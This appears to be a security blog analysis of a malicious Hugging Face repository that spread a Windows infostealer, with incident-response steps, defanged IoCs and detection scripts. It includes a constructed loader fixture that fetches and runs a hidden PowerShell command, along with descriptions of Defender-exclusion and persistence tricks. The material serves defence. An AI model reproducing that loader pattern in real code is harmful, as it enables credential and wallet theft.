
Introduction:
The AI community’s trust in open-source model repositories has been weaponized. A malicious repository, “Open-OSS/privacy-filter,” impersonating OpenAI’s legitimate privacy tool, surged to the number one trending spot on Hugging Face, racking up over 200,000 downloads before its removal. Behind its convincing facade lay a sophisticated, multi-stage infostealer designed to silently exfiltrate browser credentials, cryptocurrency wallets, SSH keys, and more from every Windows machine it touched.
Learning Objectives:
- Analyze the complete six-stage attack chain of the Open-OSS/privacy-filter malware, from initial execution to data exfiltration.
- Identify Indicators of Compromise (IoCs) and learn how to detect similar supply chain threats in AI repositories.
- Implement practical defensive measures, including system isolation, credential rotation, and advanced detection commands for Windows environments.
You Should Know:
1. Anatomy of the Attack: A Six-Stage Infection Chain
The attack began with a seemingly legitimate model card instructing users to clone the repository and execute a file. On Windows, the `loader.py` script initiated a covert, multi-stage process.
Step‑by‑step guide:
1. Initial Execution:
The malicious `loader.py` called a misleadingly named `verify_checksum_integrity()` function, which disabled SSL certificate verification (`verify=False`) and fetched a JSON payload from jsonkeeper[.]com. With verification off, the download completed without any certificate warnings that might have alerted the user.
2. PowerShell Payload Retrieval:
The JSON contained a `cmd` field passed directly to PowerShell:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "..."
This downloaded a batch file called `update.bat` from `api.eth-fastscan[.]org` (a domain mimicking a legitimate service).
3. Batch File Execution:
The batch file performed critical malicious actions:
- Checked for administrative privileges.
- Added Microsoft Defender exclusions for the directories where the final payload would be dropped.
- Downloaded the final 10 MB Rust-based infostealer payload.
- Created a scheduled task named `MicrosoftEdgeUpdateTaskCore` for persistence.
4. Evasion & Execution:
The final infostealer incorporated extensive anti-analysis techniques. It detected debuggers, sandboxes, and virtual machines (VirtualBox, VMware, Hyper-V, Parallels), halting execution if found.
5. Data Collection:
Once active, the malware launched eight parallel modules to stealthily collect:
- Chrome & Firefox login data, cookies, and session tokens.
- SSH keys, VPN configurations, and FTP credentials.
- Cryptocurrency wallet files.
- Screenshots of the user’s desktop.
6. Exfiltration:
All stolen data was compressed and sent to a command-and-control (C2) server at `recargapopular[.]com` via a POST request with a Bearer token authorization header.
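The behaviours described in steps 1 and 2 can be caught before anything runs by statically inspecting an untrusted script. The following is an added example (not code from the original post or from the repository it describes): it walks a script's AST looking for `verify=False` and for process spawns whose string arguments mention PowerShell with `-ExecutionPolicy Bypass` or `-WindowStyle Hidden`. The `SAMPLE_LOADER` fixture is constructed to mirror the described structure; its URL is a placeholder and nothing in it is executed.

```python
import ast

# Behaviours the page attributes to loader.py: TLS verification switched off (verify=False)
# and a fetched command handed to PowerShell with -ExecutionPolicy Bypass / -WindowStyle Hidden.
SPAWN_FUNCS = {"system", "popen", "Popen", "run", "call", "check_call", "check_output"}
POWERSHELL_FLAGS = ("-executionpolicy bypass", "-windowstyle hidden")

def _string_literals(node: ast.AST) -> list[str]:
    """Collect every string constant nested anywhere inside a call."""
    return [n.value for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)]

def scan_loader_source(source: str) -> list[str]:
    """Return human-readable findings for loader-style behaviour in a script."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for kw in node.keywords:  # requests.get(url, verify=False): certificate checks disabled
            if (kw.arg == "verify" and isinstance(kw.value, ast.Constant)
                    and kw.value.value is False):
                findings.append(f"line {node.lineno}: verify=False disables TLS verification")
        func = node.func
        name = func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")
        if name not in SPAWN_FUNCS:
            continue
        cmdline = " ".join(_string_literals(node)).lower()
        if "powershell" in cmdline:
            findings.append(f"line {node.lineno}: {name}() spawns powershell.exe")
        for flag in POWERSHELL_FLAGS:
            if flag in cmdline:
                findings.append(f"line {node.lineno}: PowerShell launched with {flag}")
    return findings

# Constructed fixture mirroring the described loader structure; the URL is a
# placeholder and the "cmd" value is never executed here.
SAMPLE_LOADER = '''
import json, requests, subprocess

def verify_checksum_integrity():
    resp = requests.get("https://config.example.invalid/c.json", verify=False)
    cmd = json.loads(resp.text)["cmd"]
    subprocess.run(["powershell.exe", "-ExecutionPolicy", "Bypass",
                    "-WindowStyle", "Hidden", "-Command", cmd])
'''

if __name__ == "__main__":
    for finding in scan_loader_source(SAMPLE_LOADER):
        print(finding)
```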
2. IR Checklist: Immediate Actions for Compromised Systems
If you or your team downloaded or cloned the `Open-OSS/privacy-filter` repository (or any related IoCs listed below), assume complete compromise.
Step‑by‑step guide:
1. Network Isolation: Immediately disconnect the affected host from the network to prevent further data exfiltration and C2 communication.
2. Forensic Capture: Preserve a forensic image of the system’s memory and disk for later analysis.
3. Credential Apocalypse: Rotate every credential stored in browsers, password managers, or any other credential store on that machine. Revoke all cloud provider API tokens and SSH keys that were present.
4. Defender Exclusion Audit: Check for unauthorized Microsoft Defender exclusions added by the malware. Open an elevated PowerShell and run:
Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
Remove any suspicious exclusions using:
Remove-MpPreference -ExclusionPath "<suspicious_path>"
5. Scheduled Task Analysis: List scheduled tasks registered in the last 7 days to identify the `MicrosoftEdgeUpdateTaskCore` persistence mechanism or other anomalies. The task `Date` property is a string and is empty for many built-in tasks, so test it before casting it to a date:
Get-ScheduledTask | Where-Object { $_.Date -and ([datetime]$_.Date) -gt (Get-Date).AddDays(-7) } | Format-Table TaskName, TaskPath, State, Date
6. Complete Reimaging: Wipe and reinstall the operating system. Do not rely on malware removal tools alone, as the full extent of the backdoor cannot be guaranteed.
3. Indicators of Compromise (IoCs): Your Threat Hunting Checklist
Use the following IoCs to hunt for this specific threat across your enterprise. All IP addresses and domains are intentionally defanged for safety.
| Type | Value |
| --- | --- |
| Repositories | `Open-OSS/privacy-filter` (and 6 others uploaded April 24, 2025, by same actor) |
| Loader URL (JSON) | `jsonkeeper[.]com` |
| Download Domain | `api.eth-fastscan[.]org` |
| C2 Server | `recargapopular[.]com` |
| PowerShell | Command with `-ExecutionPolicy Bypass` fetching from the above domains |
| Scheduled Task | `MicrosoftEdgeUpdateTaskCore` |
Log analysis queries (Splunk/KQL) should search for network connections to these domains and processes spawning `powershell.exe` with the `-ExecutionPolicy Bypass` flag.
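The IoC table above can be turned directly into hunting logic. This added example (not from the original post) refangs the listed domains, then scans constructed Sysmon-style JSON events for contact with those domains, `powershell.exe` launched with `-ExecutionPolicy Bypass`, and any command line referencing the `MicrosoftEdgeUpdateTaskCore` task; the event field names and the sample log lines are assumptions made for the example.

```python
import json
import re

# IoCs as listed on the page, kept defanged here; refang() normalises them for matching.
DEFANGED_DOMAINS = ["jsonkeeper[.]com", "api.eth-fastscan[.]org", "recargapopular[.]com"]
TASK_NAME = "MicrosoftEdgeUpdateTaskCore"
BYPASS_RE = re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass", re.IGNORECASE)

def refang(indicator: str) -> str:
    """Turn a defanged indicator (a[.]b) back into a matchable hostname."""
    return indicator.replace("[.]", ".").lower()

IOC_DOMAINS = [refang(d) for d in DEFANGED_DOMAINS]

def domain_matches(host: str) -> bool:
    """True for the IoC domain itself or any subdomain of it, never for look-alike suffixes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)

def hunt(events: list[dict]) -> list[tuple[str, str]]:
    """Return (event id, reason) for every record that touches an IoC."""
    hits = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        host = ev.get("DestinationHostname", "")
        if host and domain_matches(host):
            hits.append((ev["id"], f"connection to IoC domain {host}"))
        if ev.get("Image", "").lower().endswith("powershell.exe") and BYPASS_RE.search(cmd):
            hits.append((ev["id"], "powershell.exe launched with -ExecutionPolicy Bypass"))
        if TASK_NAME.lower() in cmd.lower():
            hits.append((ev["id"], f"scheduled task {TASK_NAME} referenced"))
    return hits

def parse_events(text: str) -> list[dict]:
    """One JSON object per line (a Sysmon-style export shape, constructed for this example)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

# Constructed sample telemetry; paths and hostnames are illustrative only.
SAMPLE_LOG = r"""
{"id": "1", "Image": "C:\\Python311\\python.exe", "CommandLine": "python loader.py"}
{"id": "2", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command ..."}
{"id": "3", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "DestinationHostname": "api.eth-fastscan.org"}
{"id": "4", "Image": "C:\\Windows\\System32\\schtasks.exe", "CommandLine": "schtasks /create /tn MicrosoftEdgeUpdateTaskCore ..."}
{"id": "5", "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "DestinationHostname": "www.mozilla.org"}
"""

if __name__ == "__main__":
    for event_id, reason in hunt(parse_events(SAMPLE_LOG)):
        print(f"event {event_id}: {reason}")
```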
4. Command-Line Detection: Uncovering the Malware’s Footprints
Proactive hunting for similar attack patterns requires specific command-line skills. Here are essential commands for any security analyst’s toolkit.
Detecting PowerShell Abuse:
Search the Windows Event Logs (Event ID 4104, script block logging) for PowerShell scripts that disable security controls. Note that 4104 records the content of each script block; the launch flags themselves appear on the parent process’s command line in process-creation events (Security 4688 with command-line auditing, or Sysmon Event ID 1), so hunt both sources.
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object {$_.Message -match "ExecutionPolicy Bypass" -or $_.Message -match "WindowStyle Hidden"}
Finding Base64 Encoded Payloads in Scripts:
Attackers often use Base64 encoding to hide their commands. Use this Python one-liner to scan a suspicious script for potential Base64 payloads. The regex also matches strings whose padding was stripped, so the decoder restores the padding and skips lengths that can never be valid Base64 (one more than a multiple of four), which would otherwise abort the whole scan:
python -c "import re, base64; [print(base64.b64decode(s.rstrip('=') + '=' * (-len(s.rstrip('=')) % 4)).decode('utf-8', errors='ignore')) for s in re.findall(r'[A-Za-z0-9+/]{40,}={0,2}', open('suspicious_file.ps1').read()) if len(s.rstrip('=')) % 4 != 1]"
This decodes any long Base64 strings found in a file and prints the output, often revealing the true malicious command. Strings passed to PowerShell’s -EncodedCommand are UTF‑16LE, so swap 'utf-8' for 'utf-16-le' when the output looks like letters separated by blanks.
Monitoring Exfiltration Traffic:
Monitor outbound POST requests to suspicious domains at your proxy or gateway; `curl` or Invoke-WebRequest can reproduce a request shape for comparison. Look for large, unexpected data transfers to non-standard ports.
On a Linux proxy or gateway, capture large POST requests with:
sudo tcpdump -i eth0 'tcp port 443 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354)' -A
(Note: this filter indexes past the TCP header and matches the hex pattern 0x504f5354, the ASCII bytes of “POST”, at the start of the payload. It can only see that pattern in plaintext HTTP; on port 443 the request line is inside TLS, so run it on port 80 or on the decrypted side of a TLS-terminating proxy.)
5. Securing the AI Supply Chain: From Public Repos to Production
This attack underscores a critical vulnerability: the blind trust placed in public AI model repositories. To prevent a similar incident, integrate security into your machine learning operations (MLOps) pipeline.
Implementing a Secure AI Pipeline:
- Use a Private Registry: Never pull models directly from Hugging Face into a production environment. Instead, use a private, scanned registry (e.g., using tools like `jfrog` or `cloudsmith`) to act as a sanitized buffer.
- Automated Pre-Deployment Scanning: Before any model is approved for use, scan it with static analysis tools designed for ML artifacts. Tools like `ModelAudit` can flag unsafe loading behaviors without executing the model. `Mithridatium` is another research-driven tool specifically designed to detect backdoors and data poisoning in pretrained models.
- Enforce Cryptographic Signing and Verifiable Provenance: Only allow models that have been cryptographically signed by a trusted authority and have a verifiable, non-tampered provenance. This ensures the model you scanned is the model you deploy.
- Sandbox Execution: If a model or its associated scripts must be run, do so within an isolated, ephemeral sandbox environment (e.g., a container with no network access to internal resources and strict egress controls). This contains the blast radius of any potential compromise.
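One concrete way to enforce the requirement that the model you scanned is the model you deploy is a pinned-digest manifest written at scan time and re-verified at deploy time. The following added example (not the page's or any vendor's code) does that with SHA-256 and flags modified, missing, and unexpected files such as a dropped `loader.py`; the manifest format is an assumption, and a real pipeline would additionally sign the manifest so it cannot be rewritten alongside the files.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

# Manifest shape is an assumption for this example: {relative_path: sha256 hex}.
CHUNK = 1 << 20

def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so multi-GB weights do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            digest.update(chunk)
    return digest.hexdigest()

def build_manifest(model_dir: Path) -> dict[str, str]:
    """Digest every file in the tree at scan time (paths relative, POSIX style)."""
    return {p.relative_to(model_dir).as_posix(): sha256_file(p)
            for p in sorted(model_dir.rglob("*")) if p.is_file()}

def verify_manifest(model_dir: Path, manifest: dict[str, str]) -> list[str]:
    """Return deploy-time problems; an empty list means the scanned tree is unchanged."""
    current = build_manifest(model_dir)
    problems = []
    for rel, expected in manifest.items():
        actual = current.get(rel)
        if actual is None:
            problems.append(f"missing: {rel}")
        elif not hmac.compare_digest(actual, expected):
            problems.append(f"modified: {rel}")
    for rel in current.keys() - manifest.keys():
        problems.append(f"unexpected file: {rel}")  # e.g. a loader.py that was never scanned
    return sorted(problems)

def demo() -> tuple[list[str], list[str]]:
    """Constructed scenario: a clean tree passes, then weights change and a script appears."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "config.json").write_text('{"arch": "demo"}')
        (root / "model.safetensors").write_bytes(b"\x00" * 64)
        manifest = build_manifest(root)
        clean = verify_manifest(root, manifest)
        (root / "model.safetensors").write_bytes(b"\x01" * 64)
        (root / "loader.py").write_text("print('untrusted')\n")
        tampered = verify_manifest(root, manifest)
    return clean, tampered
```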
6. Tooling Up: Automating The Hunt for Rogue AI
Manual checks are insufficient at scale. Security teams should adopt specialized tools to continuously monitor for threats from AI model hubs.
Essential Tools & Commands:
- `picklescan` (Check for Unsafe Deserialization): Many ML models use Python’s `pickle` format, which is notoriously unsafe. Run this on any downloaded `.pkl` or `.bin` file:
pip install picklescan
picklescan -p malicious_model.bin
- `Kingfisher` (Leaked Credential Detection): This tool from MongoDB scans codebases and developer platforms (including Hugging Face) for accidentally leaked credentials, which are a common target for these infostealers.
- `Check-Git-ML-Repo-Analyzer` (Identify Fake Projects): A quick tool to analyze a Git repository and detect if it is a fake ML training repo that is simply an API wrapper, a common sign of a scam or malicious project.
What Undercode Says:
- This supply chain attack succeeded by weaponizing platform popularity metrics. The repository used artificial inflation of downloads and likes to reach the trending list, manipulating trust through social proof. Always verify the reputation and history of the uploader account, not just the download count.
- The multi-stage, evasive nature of the malware (anti-sandboxing, disabling Defender, using scheduled tasks) demonstrates a professional-grade threat actor. This was not a script kiddie operation but a coordinated campaign targeting the entire open-source AI community.
- The incident is a clear signal that the “move fast and break things” culture of AI development must now include security as a non-negotiable pillar. Implementing a secure software supply chain (SSC) framework for AI artifacts is no longer optional.
Prediction:
This attack is the opening salvo in a new wave of supply chain attacks targeting the AI ecosystem. Attackers will increasingly shift from open-source libraries to AI model hubs, crafting more sophisticated, model-specific payloads (e.g., backdoored model weights, poisoned training data) that are harder to detect with traditional security tools. The integration of package and model registries into CI/CD pipelines will become a primary vector for enterprise-wide compromise, forcing a complete re-evaluation of how AI artifacts are vetted and deployed.
Reported By: Tushar Subhra – Hackers Feeds